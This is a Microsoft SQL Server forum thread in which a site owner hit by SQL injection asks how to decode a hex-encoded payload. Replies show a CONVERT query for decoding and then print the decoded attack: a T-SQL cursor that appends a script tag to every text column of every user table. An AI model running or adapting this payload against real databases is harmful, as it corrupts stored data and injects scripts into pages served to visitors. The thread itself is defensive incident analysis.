Decode Hex after SQL Injection attack

Hi Experts,

I've just been hit with a sql injection which contained a hex string - does anyone know how I can decode that hex to see what commands they were trying to run?

Many thanks,
Who is Participating?
I wear a lot of hats...

"The solutions and answers provided on Experts Exchange have been extremely helpful to me over the last few years. I wear a lot of hats - Developer, Database Administrator, Help Desk, etc., so I know a lot of things but not a lot about one thing. Experts Exchange gives me answers from people who do know a lot about one thing, in a easy to use platform." -Todd S.

SvenTech Lead Web-DevelopmentCommented:
Google: "Hex to ASCII"

Experts Exchange Solution brought to you by

Your issues matter to us.

Facing a tech roadblock? Get the help and guidance you need from experienced professionals who care. Ask your question anytime, anywhere, with no hassle.

Start your 7-day free trial
pjordannaAuthor Commented:
Ahhhh doesn't work with my HEX - comes up as gibberish - anyone got any others?

Many thanks
SvenTech Lead Web-DevelopmentCommented:
Post the string you want to decode! Maybe it is not HEX ;)
Get a highly available system for cyber protection

The Acronis SDI Appliance is a new plug-n-play solution with pre-configured Acronis Software-Defined Infrastructure software that gives service providers and enterprises ready access to a fault-tolerant system, which combines universal storage and high-performance virtualization.

FYI, in either Management Studio or Query Analyzer you should be able to take the hex string (e.g. 0x0000) and decode it using the following SQL statement:

SELECT CONVERT(varchar(5000), 0x0000).

If you wanted to convert back to hex you could do something like:

SELECT CONVERT(varbinary(5000), 'SELECT * FROM ...).

Hopefully this helps!
Here is the sql injection attack i got:

All I did was add a select statement in front e.g. SELECT sqlAttactStr to get the following result:
DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT, FROM sysobjects a,syscolumns b WHERE AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
pjordannaAuthor Commented:
Thanks guys - got hex write working in the end :)
It's more than this solution.Get answers and train to solve all your tech problems - anytime, anywhere.Try it for free Edge Out The Competitionfor your dream job with proven skills and certifications.Get started today Stand Outas the employee with proven skills.Start learning today for free Move Your Career Forwardwith certification training in the latest technologies.Start your trial today
Microsoft SQL Server

From novice to tech pro — start learning today.